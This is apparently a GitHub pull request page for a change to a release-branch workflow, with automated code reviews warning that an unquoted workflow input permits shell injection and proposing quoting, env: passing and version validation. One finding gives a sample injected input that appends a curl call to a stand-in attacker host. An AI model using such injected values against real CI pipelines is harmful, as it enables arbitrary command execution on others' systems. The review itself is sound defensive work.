
Chore/two digit branches #26818

Open
tutte wants to merge 2 commits into main from chore/two-digit-branches

Conversation

@tutte (Contributor) commented Mar 27, 2026

This PR will:

  • Add support for 2-digit branches, executing the make update_all with an extra .0 if not provided

Copilot AI review requested due to automatic review settings March 27, 2026 11:42
@github-actions github-actions bot added the labels devops and safe to test (Add this label to run secure Github workflows on PRs) Mar 27, 2026
gitar-bot bot commented Mar 27, 2026

Code Review ⚠️ Changes requested 0 resolved / 1 findings

Adds support for 2-digit branch name input but introduces a shell injection vulnerability through an unquoted workflow input on line 26 that could allow arbitrary command execution.

⚠️ Security: Unquoted workflow input enables shell injection

📄 .github/workflows/git-create-release-branch.yml:26

On line 26, ${{ inputs.release_branch_name }} is interpolated directly into the run: shell script without quotes. A malicious or accidental input value containing shell metacharacters (e.g., 1.5; curl attacker.com/...) would be executed as arbitrary commands. While this is a workflow_dispatch input (manually triggered), it's still a recognized GitHub Actions script injection pattern (see GitHub's security hardening guide).

The same unquoted expansion also means inputs with spaces or glob characters would cause unexpected behavior.

Suggested fix
Quote the interpolation:

        RELEASE_VERSION="${{ inputs.release_branch_name }}"

Alternatively, pass the input via an environment variable to fully avoid injection:

    - name: Update application versions
      env:
        RELEASE_VERSION: ${{ inputs.release_branch_name }}
      run: |
        if [[ $RELEASE_VERSION =~ ^[0-9]+\.[0-9]+$ ]]; then
          RELEASE_VERSION="${RELEASE_VERSION}.0"
          echo "... appending .0: $RELEASE_VERSION"
        fi
        make update_all RELEASE_VERSION="$RELEASE_VERSION"


- name: Update application versions
run: |
make update_all RELEASE_VERSION=${{ inputs.release_branch_name }}
RELEASE_VERSION=${{ inputs.release_branch_name }}
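Review bot: the pre-change line `make update_all RELEASE_VERSION=${{ inputs.release_branch_name }}` shown in this hunk already interpolated the input unquoted into the shell step, so the injection pattern predates this PR rather than being introduced by it; the new `RELEASE_VERSION=${{ inputs.release_branch_name }}` assignment simply carries it forward. Because the PR rewrites exactly these lines, it is the right place to move the input into `env:` and quote every later expansion, as both review comments suggest, instead of leaving the pre-existing pattern in place.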
Copilot AI left a comment


Pull request overview

Adds logic to the release-branch creation GitHub Actions workflow so that when a release branch name is provided as a 2-part version (X.Y), the version passed to make update_all is normalized to X.Y.0.

Changes:

  • Detect X.Y release versions and append .0 before running make update_all.
  • Add a log line to make the normalization explicit in workflow output.

Comment on lines +26 to +31
RELEASE_VERSION=${{ inputs.release_branch_name }}
if [[ $RELEASE_VERSION =~ ^[0-9]+\.[0-9]+$ ]]; then
RELEASE_VERSION="${RELEASE_VERSION}.0"
echo "Release version is in format X.Y, appending .0 to make it X.Y.0: $RELEASE_VERSION"
fi
make update_all RELEASE_VERSION=$RELEASE_VERSION
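Review bot: the regex at line 27 only normalizes values of the exact form X.Y; a value that matches neither X.Y nor X.Y.Z (a stray space, a typo such as `1..5`, or shell metacharacters) falls through the `if` untouched and reaches `make update_all RELEASE_VERSION=$RELEASE_VERSION` at line 31, where the unquoted expansion is word-split and passed to make as-is. Add a final check that the value matches `^[0-9]+\.[0-9]+\.[0-9]+$` and fail the step otherwise, and quote the expansion at line 31 as `RELEASE_VERSION="$RELEASE_VERSION"`; the log line at line 29 is fine but should also reflect that only validated values are forwarded.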
Copilot AI Mar 27, 2026


The workflow input is interpolated into a bash assignment unquoted (RELEASE_VERSION=${{ inputs.release_branch_name }}), which allows shell metacharacters in release_branch_name to alter the script (command injection / unexpected parsing). Pass the input via env: (or otherwise safely quote/escape it) and ensure all later expansions (including the make invocation) are quoted to avoid word-splitting or injection via $RELEASE_VERSION.

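The validate-then-normalize step that the gitar-bot suggestion and the Copilot comment above both ask for, written out as an added example rather than the project's workflow code: a POSIX sh function that assumes the release name arrives as a function argument (in a workflow step it would come from an `env:` variable, never from `${{ }}` interpolation into the script text), appends `.0` to X.Y, passes X.Y.Z through unchanged, and refuses everything else with a non-zero exit so that a bad value never reaches `make`. The function name `normalize_release_version`, the error messages and the final `printf` stand-in for the `make` call are my own choices, not anything from the repository.

```shell
#!/bin/sh
# Added example, not the project's workflow. Validates a release-branch
# version before it is handed to make, and normalizes X.Y to X.Y.0.
# Assumption: the value is passed as an argument (in a workflow step it
# would be read from an env: variable), never via ${{ }} interpolation
# into the script text, so no part of it is ever parsed as shell syntax.

# Prints the normalized version on stdout and returns 0, or prints a
# message on stderr and returns 1 for anything that is not strictly
# X.Y or X.Y.Z. A rejected value is never echoed back into a command line.
normalize_release_version() {
  rv=$1

  # First gate: only digits and dots, and not empty. This rejects
  # whitespace, newlines, globs and metacharacters in one place.
  case $rv in
    ''|*[!0-9.]*)
      printf 'refusing release version: non-numeric characters\n' >&2
      return 1 ;;
  esac

  # Second gate: the dotted structure. grep -E applies the same regexes
  # the workflow uses without requiring bash's [[ =~ ]].
  if printf '%s\n' "$rv" | grep -Eq '^[0-9]+\.[0-9]+$'; then
    printf '%s.0\n' "$rv"           # X.Y   -> X.Y.0
  elif printf '%s\n' "$rv" | grep -Eq '^[0-9]+\.[0-9]+\.[0-9]+$'; then
    printf '%s\n' "$rv"             # X.Y.Z -> unchanged
  else
    # Safe to print: gate one guarantees only digits and dots are here.
    printf 'refusing release version %s: expected X.Y or X.Y.Z\n' "$rv" >&2
    return 1
  fi
}

# Stand-alone use: ./normalize.sh 1.5 prints the make line with 1.5.0;
# ./normalize.sh '1.5 beta' exits 1 before anything is run.
if [ "$#" -gt 0 ]; then
  version=$(normalize_release_version "$1") || exit 1
  # The only place the value is expanded into a command, and it is quoted.
  printf 'would run: make update_all RELEASE_VERSION=%s\n' "$version"
fi
```

In the workflow the same function would sit at the top of the `run:` block with `RELEASE_VERSION` supplied through `env:`, and the `make` invocation would use the quoted, validated result; the step fails early on malformed input instead of forwarding it.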
@tutte tutte enabled auto-merge (squash) March 27, 2026 11:46